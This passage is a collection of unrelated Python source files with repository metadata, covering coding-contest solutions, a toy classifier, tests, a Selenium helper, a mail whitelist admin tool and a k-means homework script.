    """Train a decision tree on a tiny hard-coded ball dataset and print the
    predicted class for one (weight, surface) sample.

    Encoding: surface 1 = rough, 0 = smooth; labels 1 = tennis, 2 = cricket.
    """
    training_features = [
        [35, 1], [47, 1], [90, 0], [48, 1], [90, 0],
        [35, 1], [92, 0], [35, 1], [35, 1], [35, 1],
        [96, 0], [43, 1], [110, 0], [35, 1], [95, 0],
    ]
    training_labels = [1, 1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 2, 1, 2]
    classifier = tree.DecisionTreeClassifier()
    classifier.fit(training_features, training_labels)
    prediction = classifier.predict([[weight, surface]])
    if prediction == 1:
        print("Your object looks like Tennis Ball")
    else:
        print("Your object looks like Cricket Ball")
############################################################################
#Entry Point Function
def main():
    """Prompt for a ball's weight and surface, then classify it."""
    print("-------------------------Supervised Machine Learning----------------------------")
    weight = int(input("Enter weight: "))
    surface = input("Enter surface: ")
    # Lower-case the answer so capitalisation doesn't matter to the user.
    surface_codes = {"rough": 1, "smooth": 0}
    key = surface.lower()
    if key not in surface_codes:
        print("Invalid Input")
        return
    MarvellousMl(weight, surface_codes[key])
###########################################################################
# Starter: run main() only when executed directly, not when imported.
if __name__ == '__main__':
    main()
| ManaliKulkarni30/MachineLearning_CaseStudues | Balls3.py | Balls3.py | py | 1,843 | python | en | code | 0 | github-code | 90 |
5544477032 | # 치즈
# (Study log: reviewed once, 01:00:00, needs another review.)
from collections import deque
import sys
si = sys.stdin.readline
# 4-directional neighbour offsets (up, down, left, right).
dx = [-1,1,0,0]
dy = [0,0,-1,1]
# N x M grid: 1 = cheese, 0 = air; the border is guaranteed air per BOJ 2636.
N, M = map(int, si().split())
graph = [list(map(int, si().split())) for _ in range(N)]
time = 0
answer = []
def find_air():
    """One melting pass: BFS the outside air from (0, 0); every cheese cell
    touched by that air melts (its grid value becomes 0).

    Appends the number of cells melted this pass to the global `answer`
    list and returns it (0 means no cheese is left to melt).
    """
    melted = 0
    seen = [[False] * M for _ in range(N)]
    frontier = deque([(0, 0)])
    seen[0][0] = True
    while frontier:
        cx, cy = frontier.popleft()
        for step_x, step_y in zip(dx, dy):
            nx, ny = cx + step_x, cy + step_y
            if not (0 <= nx < N and 0 <= ny < M) or seen[nx][ny]:
                continue
            seen[nx][ny] = True
            if graph[nx][ny] == 1:
                # Cheese reached by outside air melts, but the air does not
                # pass through it during this hour.
                graph[nx][ny] = 0
                melted += 1
            else:
                frontier.append((nx, ny))
    answer.append(melted)
    return melted
# Melt one layer per hour until a pass removes nothing.
while True:
    cnt = find_air()
    if cnt == 0:
        break
    time += 1
# Total hours; answer[-1] is the final zero pass, so answer[-2] is the
# number of cheese cells that melted during the last real hour.
print(time)
print(answer[-2]) | SteadyKim/Algorism | language_PYTHON/백준/BJ2636.py | BJ2636.py | py | 1,109 | python | en | code | 0 | github-code | 90 |
1973900226 | import sys
import sys
N,M=map(int,sys.stdin.readline().split()) # N: rows, M: columns
# The two possible row patterns of a valid board; reversing the list swaps
# which pattern is "current", alternating rows of the 8x8 template.
c_rule=["BWBWBWBW","WBWBWBWB"]
chess=[0 for i in range(N)]
result=64
for i in range(N):
    M_line=sys.stdin.readline().replace('\n','')
    chess[i]=(M_line)
# Try every 8x8 window; for each, count repaints needed against both a
# B-topleft board (b_cnt) and a W-topleft board (w_cnt), keep the minimum.
for j in range(M-7):
    for i in range(N-7):
        b_cnt=0
        w_cnt=0
        cnt=0
        for h in range(8):
            for w in range(8):
                if c_rule[0][w]!=chess[i+h][j+w]:
                    b_cnt+=1
                if c_rule[1][w]!=chess[i+h][j+w]:
                    w_cnt+=1
            cnt=min(b_cnt,w_cnt)
            # Alternate the row pattern for the next row of the window; after
            # 8 reversals c_rule is back in its original order.
            c_rule.reverse()
        if cnt<result:
            result=cnt
print(result) | seminss/algorithm-study | solvedac/브루트포스 알고리즘/1018 체스판 다시 칠하기.py3 | 1018 체스판 다시 칠하기.py3 | py3 | 669 | python | en | code | 0 | github-code | 90 |
29737648465 | import pytest
from bach import SeriesDict
from bach.expression import Expression
from sql_models.util import DatabaseNotSupportedException, is_bigquery, is_postgres
from tests.unit.bach.util import get_fake_df_test_data
def test_db_not_supported_error_on_not_supported_db(dialect):
    """SeriesDict construction paths succeed on BigQuery and raise
    DatabaseNotSupportedException with a clear message on Postgres."""
    df = get_fake_df_test_data(dialect=dialect)
    # Creating a SeriesDict should work on BigQuery, and should give a clear error on Postgres.
    # wrap call in function, so it's super clear we test the same statements for all dialects
    def call_to_init():
        # This is not the 'normal' way to create a Series for the end-user, but it should give a clear error
        # none the less.
        return SeriesDict(
            engine=df.engine,
            base_node=df.base_node,
            index=df.index,
            name='test',
            expression=Expression.construct('NULL'),
            group_by=None,
            order_by=[],
            instance_dtype={'a': 'int64'},
        )
    def call_from_value():
        # more 'normal' way to create a Series
        struct = {'a': 123, 'b': 'test'}
        dtype = {'a': 'int64', 'b': 'string'}
        return SeriesDict.from_value(base=df, value=struct, name='struct', dtype=dtype)
    def call_supported_value_to_literal():
        return SeriesDict.supported_value_to_literal(dialect, {'a': 123}, {'a': 'int64'})
    if is_bigquery(dialect):
        # All three paths must simply succeed on BigQuery.
        df['x'] = call_to_init()
        df['y'] = call_from_value()
        expr = call_supported_value_to_literal()
    if is_postgres(dialect):
        # Each path must raise the dialect-specific, user-readable error.
        match = 'SeriesDict is not supported for database dialect postgresql'
        with pytest.raises(DatabaseNotSupportedException, match=match):
            df['x'] = call_to_init()
        with pytest.raises(DatabaseNotSupportedException, match=match):
            df['y'] = call_from_value()
        with pytest.raises(DatabaseNotSupportedException, match=match):
            expr = call_supported_value_to_literal()
| massimo1220/objectiv-analytics-main | bach/tests/unit/bach/test_series_dict.py | test_series_dict.py | py | 1,971 | python | en | code | 5 | github-code | 90 |
74038016297 | #!/usr/bin/python
import setuptools
# Reuse the development requirements file as the install dependency list.
with open("requirements.txt") as f:
    required = f.read().splitlines()
setuptools.setup(
    name="brendon-useful",
    version="1.0",
    packages=setuptools.find_packages(),
    install_requires=required,
    # Each console script exposes one module's main() as a shell command.
    entry_points={
        "console_scripts": [
            "useful_renamer = renamer:main",
            "useful_duplicator = duplicator:main",
            "useful_chat = chat:main",
        ],
    },
    include_package_data=True,
)
| brendonmatos/useful | setup.py | setup.py | py | 483 | python | en | code | 0 | github-code | 90 |
22132292166 | # -*- coding: utf-8 -*-
from selenium import webdriver
class ImageElement(object):
    """A rectangular page region addressed purely by coordinates.

    Mimics a WebElement's location/size/rect API for a region located by
    image matching, and moves/clicks the mouse on it by driving
    ActionChains relative to a fixed anchor element pinned at the page's
    top-left corner (so scrolling does not shift the target).
    """
    def __init__(self, parent, x, y, width, height):
        """
        Create a new ImageElement.
        :Args:
         - parent: The WebDriver.
         - x: location of the element on the X axis.
         - y: location of the element on the Y axis.
         - width: the width of the element.
         - height: the height of the element.
        """
        self._parent = parent
        self._location = {"x": x, "y": y}
        self._size = {"width": width, "height": height}
        self._rect = {"x": x, "y": y, "width": width, "height": height}
    @property
    def parent(self):
        """Internal reference to the WebDriver instance this element was found from."""
        return self._parent
    @property
    def location(self):
        """The location of the element in the renderable canvas."""
        return self._location
    @property
    def size(self):
        """The size of the element."""
        return self._size
    @property
    def rect(self):
        """A dictionary with the size and location of the element."""
        return self._rect
    def move_to(self):
        """
        Move the mouse to the center of the specified element.
        """
        self.__move_and_click(None, None, False)
    def move_at(self, xoffset, yoffset):
        """
        Move the mouse by an offset of the specified element.
        Offsets are relative to the top-left corner of the element.
        :Args:
         - xoffset: X offset to move to.
         - yoffset: Y offset to move to.
        """
        self.__move_and_click(xoffset, yoffset, False)
    def click(self):
        """
        Move the mouse to the center of the specified element and click.
        """
        self.__move_and_click(None, None, True)
    def click_at(self, xoffset, yoffset):
        """
        Move the mouse by an offset of the specified element and click.
        Offsets are relative to the top-left corner of the element.
        :Args:
         - xoffset: X offset to move to.
         - yoffset: Y offset to move to.
        """
        self.__move_and_click(xoffset, yoffset, True)
    def __move_and_click(self, xoffset=None, yoffset=None, click=False):
        # Default to the centre of the region; explicit offsets are measured
        # from the region's top-left corner.
        if xoffset is None:
            xoffset = self.location["x"] + self.size["width"] / 2
        else:
            xoffset = self.location["x"] + xoffset
        if yoffset is None:
            yoffset = self.location["y"] + self.size["height"] / 2
        else:
            yoffset = self.location["y"] + yoffset
        action = webdriver.common.action_chains.ActionChains(self.parent)
        # NOTE(review): this assumes move_to_element_with_offset measures
        # from the anchor's top-left (Selenium 3 semantics); Selenium 4
        # measures from the element centre — confirm the pinned version.
        offset_element = self.__get_element_top_left()
        action.move_to_element_with_offset(offset_element, xoffset, yoffset)
        if click:
            action.click()
        action.perform()
    def __get_element_top_left(self):
        # create an empty element at the corner top left of the webpage in order to be
        # able to click in the good position even if the page is scrolled
        javacript_create_topleft_element = """
        if(! document.getElementById("niobium-topleft-elt"))
        {
            var topleft_elt = document.createElement("div");
            topleft_elt.style.top=0;
            topleft_elt.style.left=0;
            topleft_elt.style.height=0;
            topleft_elt.style.width=0;
            topleft_elt.style.margin=0;
            topleft_elt.style.padding=0;
            topleft_elt.style.position="fixed";
            topleft_elt.id="niobium-topleft-elt";
            document.body.appendChild(topleft_elt);
        }
        """
        self.parent.execute_script(javacript_create_topleft_element)
        # find_element_by_id is the Selenium 3 API (removed in Selenium 4).
        return self.parent.find_element_by_id("niobium-topleft-elt")
| cle-b/niobium | niobium/image_element.py | image_element.py | py | 3,800 | python | en | code | 1 | github-code | 90 |
33071029295 |
#import model's script and set the output file
from DCNN_benchmark.models import *
filename = f'results/{datetag}_results_3_{HOST}.json'
# Output set-up: resume an existing results file, or start a fresh DataFrame.
# NOTE(review): the bare `except:` swallows *every* error (including typos
# inside read_json) — `except (ValueError, FileNotFoundError):` would be safer.
try:
    df_gray = pd.read_json(filename)
except:
    df_gray = pd.DataFrame([], columns=['model', 'perf', 'fps', 'time', 'label', 'i_label', 'i_image', 'filename', 'device']) 
i_trial = 0
# image preprocessing 
transform = transforms.Compose([
    transforms.Grayscale(3), # convert the image in grayscale
    transforms.Resize(int(image_size)),      # Resize the image.
    transforms.CenterCrop(int(image_size-20)),  # Crop the image with a 20 pixels border.
    transforms.ToTensor(),           # Convert the image to PyTorch Tensor data type.
    transforms.Normalize(            # Normalize the image by adjusting its average and
                                     # its standard deviation at the specified values.
    mean=[0.485, 0.456, 0.406],
    std=[0.229, 0.224, 0.225]
    )])
image_dataset_grayscale = ImageFolder(path, transform=transform) # Get the downsample dataset
# Run every model on every grayscale image, timing each forward pass and
# recording the confidence assigned to the image's true label.
for i_image, (data, label) in enumerate(image_dataset_grayscale):
    for name in models.keys():
        model = models[name]
        model.eval()
        tic = time.time()
        out = model(data.unsqueeze(0).to(device)).squeeze(0)
        percentage = torch.nn.functional.softmax(out[i_labels], dim=0) * 100
        _, indices = torch.sort(percentage, descending=True)
        dt = time.time() - tic
        i_label_top = reverse_labels[image_dataset_grayscale.classes[label]]
        perf_ = percentage[reverse_i_labels[i_label_top]].item()
        # NOTE(review): the filename is taken from `image_dataset`, not from
        # image_dataset_grayscale — confirm both index the same files.
        df_gray.loc[i_trial] = {'model':name, 'perf':perf_, 'time':dt, 'fps': 1/dt, 
                           'label':labels[i_label_top], 'i_label':i_label_top, 
                           'i_image':i_image, 'filename':image_dataset.imgs[i_image][0], 'device':str(device)}
        print(f'The {name} model get {labels[i_label_top]} at {perf_:.2f} % confidence in {dt:.3f} seconds')
        i_trial += 1
df_gray.to_json(filename)
| JNJER/2020-06-26_fast_and_curious | experiment_grayscale.py | experiment_grayscale.py | py | 2,266 | python | en | code | 0 | github-code | 90 |
70299171498 | import cocotb
from cocotb.triggers import Timer
from cocotb.triggers import FallingEdge
from cocotb.clock import Clock
from cocotb.handle import ModifiableObject
from cocotb.utils import get_sim_time
from cocotbnumpy.test import NumpyTest
from cocotbnumpy.signal import NumpySignal
import numpy as np
def model(inputs):
    """Golden reference model for the pulse-counter DUT.

    inputs: dict of equal-length per-cycle sample arrays "reset", "sig_in"
    and "enable".  Returns {"count": NumpySignal} with the expected counter
    value at every cycle: a 0->1 transition on sig_in (not masked by reset)
    increments the count when enable was high one cycle earlier, and reset
    one cycle earlier clears the count.
    """
    reset = inputs["reset"]
    sig_in = inputs["sig_in"]
    enable = inputs["enable"]
    N = len(sig_in)
    # Second NumpySignal argument presumably marks don't-care cycles —
    # TODO confirm against cocotbnumpy's documentation.
    result = NumpySignal(np.zeros(N),[1])
    count = 0
    for i in range(2,N):
        rising_edge = 0
        # NOTE(review): at i == 2, sig_in[i-3] is sig_in[-1], which wraps to
        # the *last* sample — likely unintended; verify the intended latency.
        if sig_in[i-3] == 0 and sig_in[i-2] == 1 and reset[i-2] != 1:
            rising_edge = 1
        if reset[i-1]:
            count = 0
        else:
            count += rising_edge*enable[i-1]
        result[i] = count
    exp = {
        "count": result
    }
    return exp
@cocotb.test()
async def pulse_counter_test(dut):
    """Drive three stimulus patterns through the DUT and compare each
    against model(): (1) pulses with enable held high, (2) pulses with
    reset pulsed near each input pulse, (3) pulses with enable only
    raised near each input pulse."""
    ## Test pulses
    N = 40
    pulses_at = [5,6,7,9,15,20,30,35]
    inputs = {
        "reset": np.zeros(N),
        "enable": np.ones(N),
        "sig_in": np.zeros(N),
    }
    inputs["reset"][:1] = 1
    inputs["sig_in"][pulses_at] = 1
    exp = model(inputs)
    nptest = NumpyTest(dut,inputs,exp,"clock")
    await nptest.run()
    ## Test pulses and reset
    N = 50
    pulses_at = [5,10,15,20,25,30,35,40,45]
    inputs = {
        "reset": np.zeros(N),
        "enable": np.ones(N),
        "sig_in": np.zeros(N),
    }
    inputs["reset"][:1] = 1
    # Assert reset a few cycles before each pulse (offset shrinks as iEl grows).
    for iEl,i in enumerate(pulses_at):
        inputs["sig_in"][i] = 1
        inputs["reset"][i+iEl-4] = 1
    exp = model(inputs)
    nptest = NumpyTest(dut,inputs,exp,"clock")
    await nptest.run()
    ## Test pulses and enable
    N = 50
    pulses_at = [5,10,15,20,25,30,35,40,45]
    inputs = {
        "reset": np.zeros(N),
        "enable": np.zeros(N),
        "sig_in": np.zeros(N),
    }
    inputs["reset"][:1] = 1
    # Raise enable only a few cycles before each pulse.
    for iEl,i in enumerate(pulses_at):
        inputs["sig_in"][i] = 1
        inputs["enable"][i+iEl-4] = 1
    exp = model(inputs)
    nptest = NumpyTest(dut,inputs,exp,"clock")
    await nptest.run()
| jhugon/vhdl_libs | pulse_analysis/pulse_counter/test_pulse_counter.py | test_pulse_counter.py | py | 2,076 | python | en | code | 0 | github-code | 90 |
73411582697 | #!/usr/bin/env python3
# Author: Zhang Huangbin <zhb@iredmail.org>
# Purpose: add, delete, show whitelists/blacklists for specified local recipient.
import os
import sys
os.environ['LC_ALL'] = 'C'
rootdir = os.path.abspath(os.path.dirname(__file__)) + '/../'
sys.path.insert(0, rootdir)
import web
from libs import utils, wblist
from tools import logger
# disable web.py debug output; web is used here for its DB helpers
web.config.debug = False
USAGE = """Usage:
    --outbound
        Manage white/blacklist for outbound messages.
        If no '--outbound' argument, defaults to manage inbound messages.
    --account account
        Add white/blacklists for specified (local) account. Valid formats:
            - a single user: username@domain.com
            - a single domain: @domain.com
            - entire domain and all its sub-domains: @.domain.com
            - anyone: @. (the ending dot is required)
        if no '--account' argument, defaults to '@.' (anyone).
    --add
        Add white/blacklists for specified (local) account.
    --delete
        Delete specified white/blacklists for specified (local) account.
    --delete-all
        Delete ALL white/blacklists for specified (local) account.
    --list
        Show existing white/blacklists for specified (local) account. If no
        account specified, defaults to manage server-wide white/blacklists.
    --whitelist sender1 [sender2 sender3 ...]
        Whitelist specified sender(s). Multiple senders must be separated by a space.
    --blacklist sender1 [sender2 sender3 ...]
        Blacklist specified sender(s). Multiple senders must be separated by a space.
WARNING: Do not use --list, --add-whitelist, --add-blacklist at the same time.
Sample usage:
    * Show and add server-wide whitelists or blacklists:
        python3 wblist_admin.py --add --whitelist 192.168.1.10 user@example.com
        python3 wblist_admin.py --add --blacklist 172.16.1.10 baduser@example.com
        python3 wblist_admin.py --list --whitelist
        python3 wblist_admin.py --list --blacklist
    * For per-user or per-domain whitelists and blacklists, please use option
      `--account`. for example:
        python3 wblist_admin.py --account user@mydomain.com --add --whitelist 192.168.1.10 user@example.com
        python3 wblist_admin.py --account user@mydomain.com --add --blacklist 172.16.1.10 baduser@example.com
        python3 wblist_admin.py --account user@mydomain.com --list --whitelist
        python3 wblist_admin.py --account user@mydomain.com --list --blacklist
"""
if len(sys.argv) == 1:
    print(USAGE)
    sys.exit()
elif not len(sys.argv) >= 3:
    # too few arguments: exit without output
    # NOTE(review): consider printing USAGE here as well, like the branch above
    sys.exit()
logger.info('* Establishing SQL connection.')
conn = utils.get_db_conn('amavisd')
# working copy of CLI args; recognized flags are removed as they are parsed,
# so whatever remains at the end is treated as the sender/recipient list
args = [v for v in sys.argv[1:]]
#
# Parse command line arguments
#
inout_type = 'inbound'
if '--outbound' in args:
    inout_type = 'outbound'
    args.remove('--outbound')
# Get wblist account, verify whether it's hosted locally.
account = '@.'
if '--account' in args:
    # per-domain or per-user account
    index = args.index('--account')
    account = args[index + 1]
    # Remove them.
    # (two pops at the same index drop the flag and its value)
    args.pop(index)
    args.pop(index)
wb_account = account
# NOTE(review): wb_account_type is computed but never used below -- confirm
# whether further validation of the account format was intended here.
wb_account_type = utils.is_valid_amavisd_address(wb_account)
if '@' not in account:
    sys.exit('<<< ERROR >>> Invalid account format.')
# Get wblist type.
wblist_type = ''
for_whitelist = False
for_blacklist = False
if '--whitelist' in args:
    wblist_type = 'whitelist'
    for_whitelist = True
    args.remove('--whitelist')
elif '--blacklist' in args:
    wblist_type = 'blacklist'
    for_blacklist = True
    args.remove('--blacklist')
else:
    sys.exit('No --whitelist or --blacklist specified. Exit.')
# Get action.
if '--add' in args:
    action = 'add'
    args.remove('--add')
    logger.info("* Add {} {} for account: {}".format(inout_type, wblist_type, account))
elif '--delete' in args:
    action = 'delete'
    args.remove('--delete')
    logger.info("* Delete {} {} for account: {}".format(inout_type, wblist_type, account))
elif '--delete-all' in args:
    action = 'delete-all'
    args.remove('--delete-all')
    logger.info("* Delete all {} {} for account: {}".format(inout_type, wblist_type, account))
elif '--list' in args:
    action = 'list'
    args.remove('--list')
    logger.info("* List all {} {} for account: {}".format(inout_type, wblist_type, account))
else:
    sys.exit('No --add, --delete or --list specified. Exit.')
# Get specified white/blacklists
wl = []
bl = []
# Rest of arguments are wblist senders.
# (invalid addresses are silently dropped by the validity filter)
wb_senders = [v.lower() for v in args if utils.is_valid_amavisd_address(v)]
if for_whitelist:
    wl = wb_senders
elif for_blacklist:
    bl = wb_senders
# Add, delete, show
if action == 'add':
    try:
        logger.info("* Add senders: {}".format(', '.join(wb_senders)))
        if inout_type == 'inbound':
            qr = wblist.add_wblist(conn=conn,
                                   account=wb_account,
                                   wl_senders=wl,
                                   bl_senders=bl,
                                   flush_before_import=False)
        else:
            # inout_type == 'outbound'
            qr = wblist.add_wblist(conn=conn,
                                   account=wb_account,
                                   wl_rcpts=wl,
                                   bl_rcpts=bl,
                                   flush_before_import=False)
        if not qr[0]:
            logger.error(qr[1])
    except Exception as e:
        logger.info(repr(e))
elif action == 'delete':
    try:
        if inout_type == 'inbound':
            qr = wblist.delete_wblist(conn=conn,
                                      account=wb_account,
                                      wl_senders=wl,
                                      bl_senders=bl)
        else:
            # inout_type == 'outbound':
            qr = wblist.delete_wblist(conn=conn,
                                      account=wb_account,
                                      wl_rcpts=wl,
                                      bl_rcpts=bl)
        if qr[0]:
            # qr[1] is a dict of the actually-deleted entries, keyed by kind
            _wl_senders = qr[1]['wl_senders']
            _wl_rcpts = qr[1]['wl_rcpts']
            _bl_senders = qr[1]['bl_senders']
            _bl_rcpts = qr[1]['bl_rcpts']
            for i in set(_wl_senders):
                logger.info("- Deleted: {}".format(i))
            for i in set(_wl_rcpts):
                logger.info("- Deleted: {}".format(i))
            for i in set(_bl_senders):
                logger.info("- Deleted: {}".format(i))
            for i in set(_bl_rcpts):
                logger.info("- Deleted: {}".format(i))
        else:
            logger.error(qr[1])
    except Exception as e:
        logger.info(repr(e))
elif action == 'delete-all':
    try:
        if inout_type == 'inbound':
            qr = wblist.delete_all_wblist(conn=conn,
                                          account=wb_account,
                                          wl_senders=for_whitelist,
                                          bl_senders=for_blacklist)
        else:
            # inout_type == 'outbound':
            qr = wblist.delete_all_wblist(conn=conn,
                                          account=wb_account,
                                          wl_rcpts=for_whitelist,
                                          bl_rcpts=for_blacklist)
        if not qr[0]:
            logger.error(qr[1])
    except Exception as e:
        logger.info(repr(e))
else:
    # action == 'list'
    try:
        if inout_type == 'inbound':
            qr = wblist.get_account_wblist(conn=conn,
                                           account=wb_account,
                                           whitelist=for_whitelist,
                                           blacklist=for_blacklist)
        else:
            # inout_type == 'outbound'
            qr = wblist.get_account_outbound_wblist(conn=conn,
                                                    account=wb_account,
                                                    whitelist=for_whitelist,
                                                    blacklist=for_blacklist)
        if qr[0]:
            _wb = []
            if for_whitelist:
                _wb = qr[1]['whitelist']
            elif for_blacklist:
                _wb = qr[1]['blacklist']
            if _wb:
                for i in sorted(_wb):
                    logger.info(i)
            else:
                logger.info('* No whitelist/blacklist.')
        else:
            logger.error(qr[1])
    except Exception as e:
        logger.info(repr(e))
| iredmail/iRedAPD | tools/wblist_admin.py | wblist_admin.py | py | 8,580 | python | en | code | 42 | github-code | 90 |
71621079018 | #!/usr/bin/python3
import fbgui
if __name__ == '__main__':
    # Build a 320x240 framebuffer app showing a centered "Hello World" label.
    config = fbgui.Settings()
    config.msg_level = "DEBUG"
    config.bg_color = fbgui.Color.LIGHTBLUE
    config.fg_color = fbgui.Color.WHITE
    config.font_size = 40
    config.width = 320
    config.height = 240
    config.title = "Hello World 2"
    app = fbgui.App(config)
    # toplevel label centered both ways, overriding the foreground color
    label = fbgui.Label("id1","Hello World",
                        settings=fbgui.Settings({
                          'align': (fbgui.CENTER,fbgui.CENTER),
                          'fg_color': fbgui.Color.YELLOW
                          }),toplevel=True)
    label.pack()
    app.set_widget(label)
    # blocks in the event loop until the app exits
    app.run()
| bablokb/pygame-fbgui | doc/helloworld2.py | helloworld2.py | py | 658 | python | en | code | 0 | github-code | 90 |
70772963817 | # homework 4
# goal: k-means clustering on vectors of TF-IDF values,
# normalized for every document.
# exports:
# student - a populated and instantiated cs525.Student object
# Clustering - a class which encapsulates the necessary logic for
# clustering a set of documents by tf-idf
# ########################################
# first, create a student object
# ########################################
import cs525
MY_NAME = "Jiani Gao"
MY_ANUM = 206844103 # put your UID here
MY_EMAIL = "jgao4@wpi.edu"
# the COLLABORATORS list contains tuples of 2 items, the name of the helper
# and their contribution to your homework
COLLABORATORS = [
]
# Set the I_AGREE_HONOR_CODE to True if you agree with the following statement
# "An Aggie does not lie, cheat or steal, or tolerate those who do."
I_AGREE_HONOR_CODE = True
# this defines the student object
student = cs525.Student(
MY_NAME,
MY_ANUM,
MY_EMAIL,
COLLABORATORS,
I_AGREE_HONOR_CODE
)
# ########################################
# now, write some code
# ########################################
# Our Clustering object will contain all logic necessary to crawl a local
# directory of text files, tokenize them, calculate tf-idf vectors on their
# contents then cluster them according to k-means. The Clustering class should
# select r random restarts to ensure getting good clusters and then use RSS, an
# internal metric, to calculate best clusters. The details are left to the
# student.
import re
from glob import glob
import numpy as np
from numpy import *
import sys
class Clustering(object):
    """Cluster a directory of text documents with k-means over TF-IDF vectors.

    index_dir() builds an inverted index (term -> set of document indices),
    cal_tfidf() derives one TF-IDF vector per document from it, and
    consume_dir() runs k-means with random restarts, keeping the clustering
    with the lowest RSS (residual sum of squares).

    Fixes vs. the original implementation:
      * consume_dir() now RETURNS the clustering (it previously only printed
        it, so callers received None);
      * the best clustering is recorded after each restart, so it is no
        longer left unbound when k-means converges on the first refinement
        step (or when only one restart runs);
      * cal_tfidf() assigns weight 0 to terms ABSENT from a document (the
        original assigned the bare idf, which made documents sharing no
        terms come out with identical vectors);
      * files are opened with context managers instead of being leaked.
    """

    def __init__(self):
        # term -> set of indices into self._documents containing the term
        self._index = {}
        # indexed file paths, in indexing order
        self._documents = []
        # document index -> TF-IDF vector (1 x |vocabulary| nested list)
        self._tdidf_vecs = {}

    # tokenize( text )
    # purpose: convert a string of terms into a list of terms
    # preconditions: none
    # returns: list of terms contained within the text
    # parameters:
    #   text - a string of terms
    def tokenize(self, text):
        # lowercase, replace every non-alphanumeric char with a space, split
        clean_string = re.sub('[^a-z0-9 ]', ' ', text.lower())
        return clean_string.split()

    def index_dir(self, base_path):
        """Index every not-yet-seen file under base_path.

        Returns the number of newly indexed files.
        """
        num_files_indexed = 0
        for fn in glob("%s/*" % base_path):
            if fn in self._documents:
                continue
            self._documents.append(fn)
            num_files_indexed += 1
            doc_idx = self._documents.index(fn)
            with open(fn, encoding="utf8") as fh:
                for line in fh:
                    for t in self.tokenize(line):
                        # setdefault creates the posting set on first sight
                        self._index.setdefault(t, set()).add(doc_idx)
        return num_files_indexed

    # Strip the directory and extension from a document path.
    def get_doc_name(self, path):
        return path.split("/")[-1].split(".")[0]

    # Count occurrences of `term` in the file `fn`.
    # (Re-reads the file; kept simple rather than cached, as in the original.)
    def cal_term_freq(self, term, fn):
        term_freq = 0
        with open(fn, encoding="utf8") as fh:
            for line in fh:
                term_freq += self.tokenize(line).count(term)
        return term_freq

    def cal_tfidf(self):
        """Compute a TF-IDF vector for every indexed document.

        Weight of term t in document d:
            (1 + log2(tf)) * log2(N / df)   if tf > 0
            0                               otherwise (bug fix: the original
                                            assigned log2(N / df) here)
        Returns the {doc_idx: vector} mapping.
        """
        n = len(self._documents)
        for fn in self._documents:
            doc_idx = self._documents.index(fn)
            fn_vector = zeros((1, len(self._index)))
            for i, t in enumerate(self._index):
                term_freq = self.cal_term_freq(t, fn)
                if term_freq > 0:
                    df = len(self._index[t])
                    fn_vector[0][i] = (1 + log2(term_freq)) * log2(n / df)
            self._tdidf_vecs[doc_idx] = fn_vector.tolist()
        return self._tdidf_vecs

    # consume_dir( path, k )
    # purpose: accept a path to a directory of files which need to be clustered
    # returns: list of clusters, each a list of document names (file names
    #          without directory or extension)
    # parameters:
    #   path - string path to directory of documents to cluster
    #   k - number of clusters to generate
    def consume_dir(self, path, k):
        import random
        self.index_dir(path)
        self.cal_tfidf()
        n = len(self._documents)
        min_rss = sys.maxsize
        best = None
        max_times = 10
        # ~log2(n) random restarts (at least one, so n == 1 no longer skips
        # the loop entirely) to escape bad local optima
        for _ in range(max(1, int(log2(n)))):
            # pick k distinct documents as the initial centroids
            seeds = random.sample(range(n), k)
            centroid_list = [self._tdidf_vecs[idx] for idx in seeds]
            cluster_list = self.get_docs_by_centroids(centroid_list)
            centroid_list = self.recalculate_centroid(cluster_list)
            rss = self.cal_rss(cluster_list, centroid_list)
            for _ in range(max_times):
                cluster_list = self.get_docs_by_centroids(centroid_list)
                centroid_list = self.recalculate_centroid(cluster_list)
                new_rss = self.cal_rss(cluster_list, centroid_list)
                converged = (new_rss == rss)
                rss = new_rss
                if converged:
                    break
            # record the best restart AFTER refinement (the original only
            # updated inside the loop, leaving the result unbound when
            # k-means converged immediately)
            if rss < min_rss:
                min_rss = rss
                best = cluster_list
        result_doc = []
        for cluster in best:
            result_doc.append(
                [self.get_doc_name(self._documents[doc_idx]) for doc_idx in cluster])
        return result_doc

    # Sum of L2 distances between paired old/new centroids.
    # (Currently unused; kept for API compatibility.)
    def difference(self, last_list, centroid_list):
        total = 0
        for prev, cur in zip(last_list, centroid_list):
            total += np.linalg.norm(np.array(cur) - np.array(prev), 2)
        return total

    # RSS: sum over clusters of squared distances of members to their centroid.
    def cal_rss(self, cluster_list, centroid_list):
        rss = 0
        for centroid, docs in zip(centroid_list, cluster_list):
            for doc in docs:
                rss += np.linalg.norm(
                    np.array(centroid) - np.array(self._tdidf_vecs[doc]), 2) ** 2
        return rss

    # Assign every document to its nearest centroid (L2 distance).
    # Returns a list of clusters (lists of doc indices); empty clusters are
    # dropped, matching the original behaviour.
    def get_docs_by_centroids(self, centroid_list):
        assignments = {}
        for doc, vec in self._tdidf_vecs.items():
            best_dist = sys.maxsize
            best_centroid = 0
            for c_idx, centroid in enumerate(centroid_list):
                dist = np.linalg.norm(np.array(centroid) - np.array(vec), 2)
                if dist < best_dist:
                    best_dist = dist
                    best_centroid = c_idx
            assignments.setdefault(best_centroid, []).append(doc)
        return list(assignments.values())

    # Recompute each centroid as the mean of its cluster's document vectors.
    def recalculate_centroid(self, cluster_list):
        centroid_list = []
        for cluster in cluster_list:
            total = zeros((1, len(self._index)))
            for doc in cluster:
                total += np.array(self._tdidf_vecs[doc])
            centroid_list.append((total / len(cluster)).tolist())
        return centroid_list
# now, we'll define our main function which actually starts the clusterer
def main(args):
    """Entry point: cluster the two bundled sample corpora into 5 clusters.

    Expects directories 'test10/' and 'test50/' next to the script; prints
    the student banner and the value returned by consume_dir for each run.
    """
    print(student)
    clustering = Clustering()
    print("test 10 documents")
    print(clustering.consume_dir('test10/', 5))
    print("test 50 documents")
    print(clustering.consume_dir('test50/', 5))
# this little helper will call main() if this file is executed from the command
# line but not call main() if this file is included as a module
if __name__ == "__main__":
    import sys
    main(sys.argv)
| connieGao0819/CS525-IR-Social-Web | HW4/HW4_Jiani_Gao.py | HW4_Jiani_Gao.py | py | 8,421 | python | en | code | 0 | github-code | 90 |
18431156219 | #!/usr/bin python3
# -*- coding: utf-8 -*-
from collections import Counter
def main():
    """Read N and a string S from stdin; print, modulo 1e9+7, the count of
    non-empty selections where each distinct character of S may be taken
    0..count times: prod(count_c + 1) - 1.
    """
    MOD = 10 ** 9 + 7
    _ = int(input())                 # declared length of S; value unused
    occurrences = Counter(input())
    product = 1
    for repeats in occurrences.values():
        product = product * (repeats + 1) % MOD
